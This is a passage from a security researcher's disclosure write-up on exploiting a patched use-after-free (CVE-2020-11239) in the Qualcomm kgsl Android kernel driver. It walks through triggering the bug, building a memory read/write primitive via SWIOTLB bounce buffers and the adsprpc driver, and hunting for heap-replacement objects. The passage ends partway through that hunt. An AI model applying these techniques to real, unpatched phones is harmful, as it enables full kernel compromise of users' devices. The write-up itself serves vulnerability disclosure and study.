One day short of a full chain: Part 1 — Android Kernel arbitrary code execution

Android Kernel arbitrary code execution

Original text by Man Yue Mo

In this series of posts, I’ll exploit three bugs that I reported last year: a use-after-free in the renderer of Chrome, a Chromium sandbox escape that was reported and fixed while it was still in beta, and a use-after-free in the Qualcomm msm kernel. Together, these three bugs form an exploit chain that allows remote kernel code execution by visiting a malicious website in the beta version of Chrome. While the full chain itself only affects beta version of Chrome, both the renderer RCE and kernel code execution existed in stable versions of the respective software. All of these bugs had been patched for quite some time, with the last one patched on the first of January.

Vulnerabilities used in the series

The three vulnerabilities that I’m going to use are the following. To achieve arbitrary kernel code execution from a compromised beta version of Chrome, I’ll use CVE-2020-11239, which is a use-after-free in the kgsl driver in the Qualcomm msm kernel. This vulnerability was reported in July 2020 to the Android security team as A-161544755 (GHSL-2020-375) and was patched in the Januray Bulletin. In the security bulletin, this bug was mistakenly associated with A-168722551, although the Android security team has since confirmed to acknowledge me as the original reporter of the issue. (However, the acknowledgement page had not been updated to reflect this at the time of writing.) For compromising Chrome, I’ll use CVE-2020-15972, a use-after-free in web audio to trigger a renderer RCE. This is a duplicate bug, for which an anonymous researcher reported about three weeks before I reported it as 1125635 (GHSL-2020-167). To escape the Chrome sandbox and gain control of the browser process, I’ll use CVE-2020-16045, which was reported as 1125614 (GHSL-2020-165). While the exploit uses a component that was only enabled in the beta version of Chrome, the bug would probably have made it to the stable version and be exploitable if it weren’t reported. Interestingly, the renderer bug CVE-2020-15972 was fixed in version 86.0.4240.75, the same version where the sandbox escape bug would have made into stable version of Chrome (if not reported), so these two bugs literally missed each other by one day to form a stable full chain.

Qualcomm kernel vulnerability

The vulnerability used in this post is a use-after-free in the kernel graphics support layer (kgsl) driver. This driver is used to provide an interface for apps in the userland to communicate with the Adreno gpu (the gpu that is used on Qualcomm’s snapdragon chipset). As it is necessary for apps to access this driver to render themselves, this is one of the few drivers that can be reached from third-party applications on all phones that use Qualcomm chipsets. The vulnerability itself can be triggered on all of these phones that have a kernel version 4.14 or above, which should be the case for many mid-high end phones released after late 2019, for example, Pixel 4, Samsung Galaxy S10, S20, and A71. The exploit in this post, however, could not be launched directly from a third party App on Pixel 4 due to further SELinux restrictions, but it can be launched from third party Apps on Samsung phones and possibly some others as well. The exploit in this post is largely developed with a Pixel 4 running AOSP built from source and then adapted to a Samsung Galaxy A71. With some adjustments of parameters, it should probably also work on flagship models like Samsung Galaxy S10 and S20 (Snapdragon version), although I don’t have those phones and have not tried it out myself.

The vulnerability here concerns the ioctl calls IOCTL_KGSL_GPUOBJ_IMPORT and IOCTL_KGSL_MAP_USER_MEM. These calls are used by apps to create shared memory between itself and the kgsl driver.

When using these calls, the caller specifies a user space address in their process, the size of the shared memory, as well as the type of memory objects to create. After making the ioctl call successfully, the kgsl driver would map the user supplied memory into the gpu’s memory space and be able to access the user supplied memory. Depending on the type of the memory specified in the ioctl call parameter, different mechanisms are used by the kernel to map and access the user space memory.

The two different types of memory are KGSL_USER_MEM_TYPE_ADDR, which would ask kgsl to pin the user memory supplied and perform direct I/O on those memory (see, for example, Performing Direct I/O section here). The caller can also specify the memory type to be KGSL_USER_MEM_TYPE_ION, which would use a direct memory access (DMA) buffer (for example, Direct Memory Access section here) allocated by the ion allocator to allow the gpu to access the DMA buffer directly. We’ll look at the DMA buffer a bit more later as it is important to both the vulnerability and the exploit, but for now, we just need to know that there are two different types of memory objects that can be created from these ioctl calls. When using these ioctl, a kgsl_mem_entry object will first be created, and then the type of memory is checked to make sure that the kgsl_mem_entry is correctly populated. In a way, these ioctl calls act like constructors of kgsl_mem_entry:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
    ...
    entry = kgsl_mem_entry_create();
    ...
	if (param->type == KGSL_USER_MEM_TYPE_ADDR)
		ret = _gpuobj_map_useraddr(dev_priv->device, private->pagetable,
			entry, param);
    //KGSL_USER_MEM_TYPE_ION is translated to KGSL_USER_MEM_TYPE_DMABUF
	else if (param->type == KGSL_USER_MEM_TYPE_DMABUF)
		ret = _gpuobj_map_dma_buf(dev_priv->device, private->pagetable,
			entry, param, &fd);
	else
		ret = -ENOTSUPP;

In particular, when creating a kgsl_mem_entry with DMA type memory, the user supplied DMA buffer will be «attached» to the gpu, which will then allow the gpu to share the DMA buffer. The process of sharing a DMA buffer with a device on Android generally looks like this (see this for the general process of sharing a DMA buffer with a device):

  1. The user creates a DMA buffer using the ion allocator. On Android, ion is the concrete implementation of DMA buffers, so sometimes the terms are used interchangeably, as in the kgsl code here, in which KGSL_USER_MEM_TYPE_DMABUF and KGSL_USER_MEM_TYPE_ION refers to the same thing.
  2. The ion allocator will then allocate memory from the ion heap, which is a special region of memory seperated from the heap used by the kmalloc family of calls. I’ll cover more about the ion heap later in the post.
  3. The ion allocator will return a file descriptor to the user, which is used as a handle to the DMA buffer.
  4. The user can then pass this file descriptor to the device via an appropriate ioctl call.
  5. The device then obtains the DMA buffer from the file descriptor via dma_buf_get and uses dma_buf_attach to attach it to itself.
  6. The device uses dma_buf_map_attachment to obtain the sg_table of the DMA buffer, which contains the locations and sizes of the backing stores of the DMA buffer. It can then use it to access the buffer.
  7. After this, both the device and the user can access the DMA buffer. This means that the buffer can now be modified by both the cpu (by the user) and the device. So care must be taken to synchronize the cpu view of the buffer and the device view of the buffer. (For example, the cpu may cache the content of the DMA buffer and then the device modified its content, resulting in stale data in the cpu (user) view) To do this, the user can use DMA_BUF_IOCTL_SYNC call of the DMA buffer to synchronize the different views of the buffer before and after accessing it.

When the device is done with the shared buffer, it is important to call the functions dma_buf_unmap_attachmentdma_buf_detach, and dma_buf_put to perform the appropriate clean up.

In the case of sharing DMA buffer with the kgsl driver, the sg_table that belongs to the DMA buffer will be stored in the kgsl_mem_entry as the field sgt:

static int kgsl_setup_dma_buf(struct kgsl_device *device,
				struct kgsl_pagetable *pagetable,
				struct kgsl_mem_entry *entry,
				struct dma_buf *dmabuf)
{
    ...
	sg_table = dma_buf_map_attachment(attach, DMA_TO_DEVICE);
    ...
	meta->table = sg_table;
	entry->priv_data = meta;
	entry->memdesc.sgt = sg_table;

On the other hand, in the case of a MAP_USER_MEM type memory object, the sg_table in memdesc.sgt is created and owned by the kgsl_mem_entry:

static int memdesc_sg_virt(struct kgsl_memdesc *memdesc, struct file *vmfile)
{
    ...
    //Creates an sg_table and stores it in memdesc->sgt
	ret = sg_alloc_table_from_pages(memdesc->sgt, pages, npages,
					0, memdesc->size, GFP_KERNEL);

As such, care must be taken with the ownership of memdesc->sgt when kgsl_mem_entry is destroyed. If the ioctl call somehow failed, then the memory object that is created will have to be destroyed. Depending on the type of the memory, the clean up logic will be different:

unmap:
	if (param->type == KGSL_USER_MEM_TYPE_DMABUF) {
		kgsl_destroy_ion(entry->priv_data);
		entry->memdesc.sgt = NULL;
	}

	kgsl_sharedmem_free(&entry->memdesc);

If we created an ION type memory object, then apart from the extra clean up that detaches the gpu from the DMA buffer, entry->memdesc.sgt is set to NULL before entering kgsl_sharedmem_free, which will free entry->memdesc.sgt:

void kgsl_sharedmem_free(struct kgsl_memdesc *memdesc)
{
    ...
	if (memdesc->sgt) {
		sg_free_table(memdesc->sgt);
		kfree(memdesc->sgt);
	}

	if (memdesc->pages)
		kgsl_free(memdesc->pages);
}

So far, so good, everything is taken care of, but a closer look reveals that, when creating a KGSL_USER_MEM_TYPE_ADDR object, the code would first check if the user supplied address is allocated by the ion allocator, if so, it will create an ION type memory object instead.

static int kgsl_setup_useraddr(struct kgsl_device *device,
		struct kgsl_pagetable *pagetable,
		struct kgsl_mem_entry *entry,
		unsigned long hostptr, size_t offset, size_t size)
{
    ...
 	/* Try to set up a dmabuf - if it returns -ENODEV assume anonymous */
	ret = kgsl_setup_dmabuf_useraddr(device, pagetable, entry, hostptr);
	if (ret != -ENODEV)
		return ret;

	/* Okay - lets go legacy */
	return kgsl_setup_anon_useraddr(pagetable, entry,
		hostptr, offset, size);
}

While there is nothing wrong with using a DMA mapping when the user supplied memory is actually a dma buffer (allocated by ion), if something goes wrong during the ioctl call, the clean up logic will be wrong and memdesc->sgt will be incorrectly deleted. Fortunately, before the ION ABI change introduced in the 4.12 kernel, the now freed sg_table cannot be reached again. However, after this change, the sg_table gets added to the dma_buf_attachment when a DMA buffer is attached to a device, and the dma_buf_attachment is then stored in the DMA buffer.

static int ion_dma_buf_attach(struct dma_buf *dmabuf, struct device *dev,
                                struct dma_buf_attachment *attachment)
{
    ...
        table = dup_sg_table(buffer->sg_table);
    ...
        a->table = table;                          //<---- c. duplicated table stored in attachment, which is the output of dma_buf_attach in a.
    ...
        mutex_lock(&buffer->lock);
        list_add(&a->list, &buffer->attachments);  //<---- d. attachment got added to dma_buf::attachments
        mutex_unlock(&buffer->lock);
        return 0;
}

This will normally be removed when the DMA buffer is detached from the device. However, because of the wrong clean up logic, the DMA buffer will never be detached in this case, (kgsl_destroy_ion is not called) meaning that after the ioctl call failed, the user supplied DMA buffer will end up with an attachment that contains a free’d sg_table. This sg_table will then be used any time when the DMA_BUF_IOCTL_SYNC call is used on the buffer:

static int __ion_dma_buf_begin_cpu_access(struct dma_buf *dmabuf,
                                          enum dma_data_direction direction,
                                          bool sync_only_mapped)
{
    ...
        list_for_each_entry(a, &buffer->attachments, list) {
        ...
                if (sync_only_mapped)
                        tmp = ion_sgl_sync_mapped(a->dev, a->table->sgl,        //<--- use-after-free of a->table
                                                  a->table->nents,
                                                  &buffer->vmas,
                                                  direction, true);
                else
                        dma_sync_sg_for_cpu(a->dev, a->table->sgl,              //<--- use-after-free of a->table
                                            a->table->nents, direction);
            ...
                }
        }
...
}

There are actually multiple paths in this ioctl that can lead to the use of the sg_table in different ways.

Getting a free’d object with a fake out-of-memory error

While this looks like a very good use-after-free that allows me to hold onto a free’d object and use it at any convenient time, as well as in different ways, to trigger it, I first need to cause the IOCTL_KGSL_GPUOBJ_IMPORT or IOCTL_KGSL_MAP_USER_MEM to fail and to fail at the right place. The only place where a use-after-free can happen in the IOCTL_KGSL_GPUOBJ_IMPORT call is when it fails at kgsl_mem_entry_attach_process:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
    ...
	kgsl_memdesc_init(dev_priv->device, &entry->memdesc, param->flags);
	if (param->type == KGSL_USER_MEM_TYPE_ADDR)
		ret = _gpuobj_map_useraddr(dev_priv->device, private->pagetable,
			entry, param);
	else if (param->type == KGSL_USER_MEM_TYPE_DMABUF)
		ret = _gpuobj_map_dma_buf(dev_priv->device, private->pagetable,
			entry, param, &fd);
	else
		ret = -ENOTSUPP;

	if (ret)
		goto out;

    ...
	ret = kgsl_mem_entry_attach_process(dev_priv->device, private, entry);
	if (ret)
		goto unmap;

This is the last point where the call can fail. Any earlier failure will also not result in kgsl_sharedmem_free being called. One way that this can fail is if kgsl_mem_entry_track_gpuaddr failed to reserve memory in the gpu due to out-of-memory error:

static int kgsl_mem_entry_attach_process(struct kgsl_device *device,
		struct kgsl_process_private *process,
		struct kgsl_mem_entry *entry)
{
    ...
	ret = kgsl_mem_entry_track_gpuaddr(device, process, entry);
	if (ret) {
		kgsl_process_private_put(process);
		return ret;
	}

Of course, to actually cause an out-of-memory error would be rather difficult and unreliable, as well as risking to crash the device by exhausting the memory.

If we look at how a user provided address is mapped to gpu address in kgsl_iommu_get_gpuaddr, (which is called by kgsl_mem_entry_track_gpuaddr, note that these are actually user space gpu address in the sense that they are used by the gpu with a user process specific pagetable to resolve the actual addresses, so different processes can have the same gpu addresses that resolved to different actual locations, in the same way that user space addresses can be the same in different processes but resolved to different locations) then we see that an alignment parameter is taken from the flags of the kgsl_memdesc:

static int kgsl_iommu_get_gpuaddr(struct kgsl_pagetable *pagetable,
		struct kgsl_memdesc *memdesc)
{
    ...
	unsigned int align;
    ...
    //Uses `memdesc->flags` to compute the alignment parameter
	align = max_t(uint64_t, 1 << kgsl_memdesc_get_align(memdesc),
			memdesc->pad_to);
...

and the flags of memdesc is taken from the flags parameter when the ioctl is called:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
    ...
	kgsl_memdesc_init(dev_priv->device, &entry->memdesc, param->flags);

When mapping memory to the gpu, this align value will be used to ensure that the memory address is mapped to a value that is aligned (i.e. multiples of) to align. In particular, the gpu address will be the next multiple of align that is not already occupied. If no such value exist, then an out-of-memory error will occur. So by using a large align value in the ioctl call, I can easily use up all the addresses that are aligned with the value that I specified. For example, if I set align to be 1 << 31, then there will only be two addresses that aligns with align (0 and 1 << 31). So after just mapping one memory object (which can be as small as 4096 bytes), I’ll get an out-of-memory error the next time I use the ioctl call. This will then give me a free’d sg_table in the DMA buffer. By allocating another object of similar size in the kernel, I can then replace this sg_table with an object that I control. I’ll go through the details of how to do this later, but for now, let’s assume I am able to do this and have complete control of all the fields in this sg_table and see what this bug potentially allows me to do.

The primitives of the vulnerability

As mentioned before, there are different ways to use the free’d sg_table via the DMA_BUF_IOCTL_SYNC ioctl call:

static long dma_buf_ioctl(struct file *file,
			  unsigned int cmd, unsigned long arg)
{
    ...
	switch (cmd) {
	case DMA_BUF_IOCTL_SYNC:
        ...
		if (sync.flags & DMA_BUF_SYNC_END)
			if (sync.flags & DMA_BUF_SYNC_USER_MAPPED)
				ret = dma_buf_end_cpu_access_umapped(dmabuf,
								     dir);
			else
				ret = dma_buf_end_cpu_access(dmabuf, dir);
		else
			if (sync.flags & DMA_BUF_SYNC_USER_MAPPED)
				ret = dma_buf_begin_cpu_access_umapped(dmabuf,
								       dir);
			else
				ret = dma_buf_begin_cpu_access(dmabuf, dir);

		return ret;

These will ended up calling the functions __ion_dma_buf_begin_cpu_access or __ion_dma_buf_end_cpu_access that provide the concrete implemenations.

As explained before, the DMA_BUF_IOCTL_SYNC call is meant to synchronize the cpu view of the DMA buffer and the device (in this case, gpu) view of the DMA buffer. For the kgsl device, the synchronization is implemented in lib/swiotlb.c. The various different ways of syncing the buffer will more or less follow a code path like this:

  1. The scatterlist in the free’d sg_table is iterated in a loop;
  2. In each iteration, the dma_address and dma_length of the scatterlist is used to identify the location and size of the memory for synchronization.
  3. The function swiotlb_sync_single is called to perform the actual synchronization of the memory.

So what does swiotlb_sync_single do? It first checks whether the dma_address (dev_addrdma_to_phys for kgsl is just the identity function) in the scatterlist is an address of a swiotlb_buffer using the is_swiotlb_buffer function, if so, it calls swiotlb_tlb_sync_single, otherwise, it will call dma_mark_clean.

static void
swiotlb_sync_single(struct device *hwdev, dma_addr_t dev_addr,
		    size_t size, enum dma_data_direction dir,
		    enum dma_sync_target target)
{
	phys_addr_t paddr = dma_to_phys(hwdev, dev_addr);

	BUG_ON(dir == DMA_NONE);

	if (is_swiotlb_buffer(paddr)) {
		swiotlb_tbl_sync_single(hwdev, paddr, size, dir, target);
		return;
	}

	if (dir != DMA_FROM_DEVICE)
		return;

	dma_mark_clean(phys_to_virt(paddr), size);
}

The function dma_mark_clean simply flushes the cpu cache that corresponds to dev_addr and keeps the cpu cache in sync with the actual memory. I wasn’t able to exploit this path and so I’ll concentrate on the swiotlb_tbl_sync_single path.

void swiotlb_tbl_sync_single(struct device *hwdev, phys_addr_t tlb_addr,
			     size_t size, enum dma_data_direction dir,
			     enum dma_sync_target target)
{
	int index = (tlb_addr - io_tlb_start) >> IO_TLB_SHIFT;
	phys_addr_t orig_addr = io_tlb_orig_addr[index];

	if (orig_addr == INVALID_PHYS_ADDR)                            //<--------- a. checks address valid
		return;
	orig_addr += (unsigned long)tlb_addr & ((1 << IO_TLB_SHIFT) - 1);

	switch (target) {
	case SYNC_FOR_CPU:
		if (likely(dir == DMA_FROM_DEVICE || dir == DMA_BIDIRECTIONAL))
			swiotlb_bounce(orig_addr, tlb_addr,
				       size, DMA_FROM_DEVICE);
    ...
}

After a further check of the address (tlb_addr) against an array io_tlb_orig_addr, the function swiotlb_bounce is called.

static void swiotlb_bounce(phys_addr_t orig_addr, phys_addr_t tlb_addr,
			   size_t size, enum dma_data_direction dir)
{
    ...
	unsigned char *vaddr = phys_to_virt(tlb_addr);
	if (PageHighMem(pfn_to_page(pfn))) {
        ...

		while (size) {
			sz = min_t(size_t, PAGE_SIZE - offset, size);

			local_irq_save(flags);
			buffer = kmap_atomic(pfn_to_page(pfn));
			if (dir == DMA_TO_DEVICE)
				memcpy(vaddr, buffer + offset, sz);
			else
				memcpy(buffer + offset, vaddr, sz);
            ...
		}
	} else if (dir == DMA_TO_DEVICE) {
		memcpy(vaddr, phys_to_virt(orig_addr), size);
	} else {
		memcpy(phys_to_virt(orig_addr), vaddr, size);
	}
}

As tlb_addr and size comes from a scatterlist in the free’d sg_table, it becomes clear that I may be able to call a memcpy with a partially controlled source/destination (tlb_addr comes from scatterlist but is constrained as it needs to pass some checks, while size is unchecked). This could potentially give me a very strong relative read/write primitive. The questions are:

  1. What is the swiotlb_buffer and is it possible to pass the is_swiotlb_buffer check without a seperate info leak?
  2. What is the io_tlb_orig_addr and how to pass that test?
  3. How much control do I have with the orig_addr, which comes from io_tlb_orig_addr?

The Software Input Output Translation Lookaside Buffer

The Software Input Output Translation Lookaside Buffer (SWIOTLB), sometimes known as the bounce buffer, is a memory region with physical address smaller than 32 bits. It seems to be very rarely used in modern Android phones and as far as I can gather, there are two main uses of it:

  1. It is used when a DMA buffer that has a physical address higher than 32 bits is attached to a device that can only access 32 bit addresses. In this case, the SWIOTLB is used as a proxy of the DMA buffer to allow access of it from the device. This is the code path that we have been looking at. As this would mean an extra read/write operation between the DMA buffer and the SWIOTLB every time a synchronization between the device and DMA buffer happens, it is not an ideal scenario but is rather only used as a last resort.
  2. To use as a layer of protection to avoid untrusted usb devices from accessing DMA memory directly (See here)

As the second usage is likely to involve plugging a usb device to a phone and thus requires physical access. I’ll only cover the first usage here, which will also answer the three questions in the previous section.

To begin with, let’s take a look at the location of the SWIOTLB. This is used by the check is_swiotlb_buffer to determine whether a physical address belongs to the SWIOTLB:

int is_swiotlb_buffer(phys_addr_t paddr)
{
	return paddr >= io_tlb_start && paddr < io_tlb_end;
}

The global variables io_tlb_start and io_tlb_end marks the range of the SWIOTLB. As mentioned before, the SWIOTLB needs to be an address smaller than 32 bits. How does the kernel guarantee this? By allocating the SWIOTLB very early during boot. From a rooted device, we can see that the SWIOTLB is allocated nearly right at the start of the boot. This is an excerpt of the kernel log during the early stage of booting a Pixel 4:

...
[    0.000000] c0      0 software IO TLB: swiotlb init: 00000000f3800000
[    0.000000] c0      0 software IO TLB: mapped [mem 0xf3800000-0xf3c00000] (4MB)
...

Here we see that io_tlb_start is 0xf3800000 while io_tlb_end is 0xf3c00000.

While allocating the SWIOTLB early makes sure that the its address is below 32 bits, it also makes it predictable. In fact, the address only seems to depend on the amount of memory configured for the SWIOTLB, which is passed as the swiotlb boot parameter. For Pixel 4, this is swiotlb=2048 (which seems to be a common parameter and is the same for Galaxy S10 and S20) and will allocate 4MB of SWIOTLB (allocation size = swiotlb * 2048) For the Samsung Galaxy A71, the parameter is set to swiotlb=1, which allocates the minimum amount of SWIOTLB (0x40000 bytes)

[    0.000000] software IO TLB: mapped [mem 0xfffbf000-0xfffff000] (0MB)

The SWIOTLB will be at the same location when changing swiotlb to 1 on Pixel 4.

This provides us with a predicable location for the SWIOTLB to pass the is_swiotlb_buffer test.

Let’s take a look at io_tlb_orig_addr next. This is an array used for storing addresses of DMA buffers that are attached to devices with addresses that are too high for the device to access:

int
swiotlb_map_sg_attrs(struct device *hwdev, struct scatterlist *sgl, int nelems,
		     enum dma_data_direction dir, unsigned long attrs)
{
    ...
	for_each_sg(sgl, sg, nelems, i) {
		phys_addr_t paddr = sg_phys(sg);
		dma_addr_t dev_addr = phys_to_dma(hwdev, paddr);

		if (swiotlb_force == SWIOTLB_FORCE ||
		    !dma_capable(hwdev, dev_addr, sg->length)) {
            //device cannot access dev_addr, so use SWIOTLB as a proxy
			phys_addr_t map = map_single(hwdev, sg_phys(sg),
						     sg->length, dir, attrs);
             ...
}

In this case, map_single will store the address of the DMA buffer (dev_addr) in the io_tlb_orig_addr. This means that if I can cause a SWIOTLB mapping to happen by attaching a DMA buffer with high address to a device that cannot access it (!dma_capable), then the orig_addr in memcpy of swiotlb_bounce will point to a DMA buffer that I control, which means I can read and write its content with complete control.

static void swiotlb_bounce(phys_addr_t orig_addr, phys_addr_t tlb_addr,
			   size_t size, enum dma_data_direction dir)
{
    ...
    //orig_addr is the address of a DMA buffer uses the SWIOTLB mapping
	} else if (dir == DMA_TO_DEVICE) {
		memcpy(vaddr, phys_to_virt(orig_addr), size);
	} else {
		memcpy(phys_to_virt(orig_addr), vaddr, size);
	}
}

It now becomes clear that, if I can allocate a SWIOTLB, then I will be able to perform both read and write of a region behind the SWIOTLB region with arbitrary size (and completely controlled content in the case of write). In what follows, this is what I’m going to use for the exploit.

To summarize, this is how synchronization works for DMA buffer shared with the implementation in /lib/swiotlb.c.

When the device is capable of accessing the DMA buffer’s address, synchronization will involve flushing the cpu cache:

figure

When the device cannot access the DMA buffer directly, a SWIOTLB is created as an intermediate buffer to allow device access. In this case, the io_tlb_orig_addr array is served as a look up table to locate the DMA buffer from the SWIOTLB.

figure

In the use-after-free scenario, I can control the size of the memcpy between the DMA buffer and SWIOTLB in the above figure and that turns into a read/write primitive:

figure

Provided I can control the scatterlist that specifies the location and size of the SWIOTLB, I can specify the size to be larger than the original DMA buffer to cause an out-of-bounds access (I still need to point to the SWIOTLB to pass the checks). Of course, it is no good to just cause out-of-bounds access, I need to be able to read back the out-of-bounds data in the case of a read access and control the data that I write in the case of a write access. This issue will be addressed in the next section.

Allocating a Software Input Output Translation Lookaside Buffer

As it turns out, the SWIOTLB is actually very rarely used. For one or another reason, either because most devices are capable of reading 64 bit addresses, or that the DMA buffer synchronization is implemented with arm_smmu rather than swiotlb, I only managed to allocate a SWIOTLB using the adsprpc driver. The adsprpc driver is used for communicating with the DSP (digital signal processor), which is a seperate processor on Qualcomm’s snapdragon chipset. The DSP and the adsprpc itself is a very vast topic that had many security implications, and it is out of the scope of this post.

Roughly speaking, the DSP is a specialized chip that is optimized for certain computationally intensive tasks such as image, video, audio processing and machine learning. The cpu can offload these tasks to the DSP to improve overall performance. However, as the DSP is a different processor altogether, an RPC mechanism is needed to pass data and instructions between the cpu and the DSP. This is what the adsprpc driver is for. It allows the kernel to communicate with the DSP (which is running on a separate kernel and OS altogether, so this is truly «remote») to invoke functions, allocate memory and retrieve results from the DSP.

While access to the adsprpc driver from third-party apps is not granted in the default SELinux settings and as such, I’m unable to use it on Google’s Pixel phones, it is still enabled on many different phones running Qualcomm’s snapdragon SoC (system on chip). For example, Samsung phones allow accesses of adsprpc from third party Apps, which allows the exploit in this post to be launched directly from a third party App or from a compromised beta version of Chrome (or any other compromised App). On phones which adsprpc accesses is not allowed, such as the Pixel 4, an additional bug that compromises a service that can access adsprpc is required to launch this exploit. There are various services that can access the adsprpc driver and reachable directly from third party Apps, such as the hal_neuralnetworks, which is implemented as a closed source service in android.hardware.neuralnetworks@1.x-service-qti. I did not investigate this path, so I’ll assume Samsung phones in the rest of this post.

With adsprpc, the most obvious ioctl to use for allocating SWIOTLB is the FASTRPC_IOCTL_MMAP, which calls fastrpc_mmap_create to attach a DMA buffer that I supplied:

static int fastrpc_mmap_create(struct fastrpc_file *fl, int fd,
	unsigned int attr, uintptr_t va, size_t len, int mflags,
	struct fastrpc_mmap **ppmap)
{
    ...
	} else if (mflags == FASTRPC_DMAHANDLE_NOMAP) {
		VERIFY(err, !IS_ERR_OR_NULL(map->buf = dma_buf_get(fd)));
		if (err)
			goto bail;
		VERIFY(err, !dma_buf_get_flags(map->buf, &flags));
        ...
		map->attach->dma_map_attrs |= DMA_ATTR_SKIP_CPU_SYNC;
        ...

However, the call seems to always fail when fastrpc_mmap_on_dsp is called, which will then detach the DMA buffer from the adsprpc driver and remove the SWIOTLB that was just allocated. While it is possible to work with a temporary buffer like this by racing with multiple threads, it would be better if I can allocate a permanent SWIOTLB.

Another possibility is to use the get_args function, which will also invoke fastrpc_mmap_create:

static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)
{
    ...
	for (i = bufs; i < bufs + handles; i++) {
        ...
		if (ctx->attrs && (ctx->attrs[i] & FASTRPC_ATTR_NOMAP))
			dmaflags = FASTRPC_DMAHANDLE_NOMAP;
		VERIFY(err, !fastrpc_mmap_create(ctx->fl, ctx->fds[i],
				FASTRPC_ATTR_NOVA, 0, 0, dmaflags,
				&ctx->maps[i]));
        ...
	}

The get_args function is used in the various FASTRPC_IOCTL_INVOKE_* calls for passing arguments to invoke functions on the DSP. Under normal circumstances, a corresponding put_args will be called to detach the DMA buffer from the adsprpc driver. However, if the remote invocation failed, the call to put_args will be skipped and the clean up will be deferred to the time when the adsprpc file is close:

static int fastrpc_internal_invoke(struct fastrpc_file *fl, uint32_t mode,
				   uint32_t kernel,
				   struct fastrpc_ioctl_invoke_crc *inv)
{
    ...
	if (REMOTE_SCALARS_LENGTH(ctx->sc)) {
		PERF(fl->profile, GET_COUNTER(perf_counter, PERF_GETARGS),
		VERIFY(err, 0 == get_args(kernel, ctx));                  //<----- get_args
		PERF_END);
		if (err)
			goto bail;
	}
    ...
 wait:
	if (kernel) {
      ....
	} else {
		interrupted = wait_for_completion_interruptible(&ctx->work);
		VERIFY(err, 0 == (err = interrupted));
		if (err)
			goto bail;                                        //<----- invocation failed and jump to bail directly
	}
    ...
	VERIFY(err, 0 == put_args(kernel, ctx, invoke->pra));    //<------ detach the arguments
	PERF_END);
    ...
 bail:
    ...
	return err;
}

So by using FASTRPC_IOCTL_INVOKE_* with an invalid remote function, it is easy to allocate and keep the SWIOTLB alive until I choose to close the /dev/adsprpc-smd file that is used to make the ioctl call. This is the only part that the adsprpc driver is needed and we’re now set up to start writing the exploit.

Now that I can allocate SWIOTLB that maps to DMA buffers that I created, I can do the following to exploit the out-of-bounds read/write primitive from the previous section.

  1. First allocate a number of DMA buffers. By manipulating the ion heap, (which I’ll go through later in this post), I can place some useful data behind one of these DMA buffers. I will call this buffer DMA_1.
  2. Use the adsprpc driver to allocate SWIOTLB buffers associated with these DMA buffers. I’ll arrange it so that the DMA_1 occupies the first SWIOTLB (which means all other SWIOTLB will be allocated behind it), call this SWIOTLB_1. This can be done easily as SWIOTLB are simply allocated as a contiguous array.
  3. Use the read/write primitive in the previous section to trigger out-of-bounds read/write on DMA_1. This will either write the memory behind DMA_1 to the SWIOTLB behind SWIOTLB_1, or vice versa.
  4. As the SWIOTLB behind SWIOTLB_1 are mapped to the other DMA buffers that I controlled, I can use the DMA_BUF_IOCTL_SYNC ioctl of these DMA buffers to either read data from these SWIOTLB or write data to them. This translates into arbitrary read/write of memory behind DMA_1.

The following figure illustrates this with a simplified case of two DMA buffers.

figure

Replacing the sg_table

So far, I planned an exploitation strategy based on the assumption that I already have control of the scatterlist sgl of the free’d sg_table. In order to actually gain control of it, I need to replace the free’d sg_table with a suitable object. This turns out to be the most complicated part of the exploit. While there are well-known kernel heap spraying techniques that allows us to replace a free’d object with controlled data (for example the sendmsg and setxattr), they cannot be applied directly here as the sgl of the free’d sg_table here needs to be a valid pointer that points to controlled data. Without a way to leak a heap address, I’ll not be able to use these heap spraying techniques to construct a valid object. With this bug alone, there is almost no hope of getting an info leak at this stage. The other alternative is to look for other suitable objects to replace the sg_table. A CodeQL query can be used to help looking for suitable objects:

from FunctionCall fc, Type t, Variable v, Field f, Type t2
where (fc.getTarget().hasName("kmalloc") or
       fc.getTarget().hasName("kzalloc") or
       fc.getTarget().hasName("kcalloc"))
      and
      exists(Assignment assign | assign.getRValue() = fc and
             assign.getLValue() = v.getAnAccess() and
             v.getType().(PointerType).refersToDirectly(t)) and
      t.getSize() < 128 and t.fromSource() and
      f.getDeclaringType() = t and
      (f.getType().(PointerType).refersTo(t2) and t2.getSize() <= 8) and
      f.getByteOffset() = 0
select fc, t, fc.getLocation()

In this query, I look for objects created via kmallockzalloc or kcalloc that are of size smaller than 128 (same bucket as sg_table) and have a pointer field as the first field. However, I wasn’t able to find a suitable object, although filename allocated in getname_flags came close:

struct filename *
getname_flags(const char __user *filename, int flags, int *empty)
{
	struct filename *result;
    ...
	if (unlikely(len == EMBEDDED_NAME_MAX)) {
        ...
		result = kzalloc(size, GFP_KERNEL);
		if (unlikely(!result)) {
			__putname(kname);
			return ERR_PTR(-ENOMEM);
		}
		result->name = kname;
		len = strncpy_from_user(kname, filename, PATH_MAX);
        ...

with name points to a user controlled string and can be reached using, for example, the mknod syscall. However, not being able to use null character turns out to be too much of a restriction here.

Just-in-time object replacement

Let’s take a look at how the free’d sg_table is used, say, in __ion_dma_buf_begin_cpu_access, it seems that at some point in the execution, the sgl field is taken from the sgl_table, and the sgl_table itself will no longer be used, but only the cached pointer value of sgl is used:

static int __ion_dma_buf_begin_cpu_access(struct dma_buf *dmabuf,
					  enum dma_data_direction direction,
					  bool sync_only_mapped)
{
    
		if (sync_only_mapped)
			tmp = ion_sgl_sync_mapped(a->dev, a->table->sgl,    //<------- `sgl` got passed, and `table` never used again
						  a->table->nents,
						  &buffer->vmas,
						  direction, true);
		else
			dma_sync_sg_for_cpu(a->dev, a->table->sgl,
					    a->table->nents, direction);

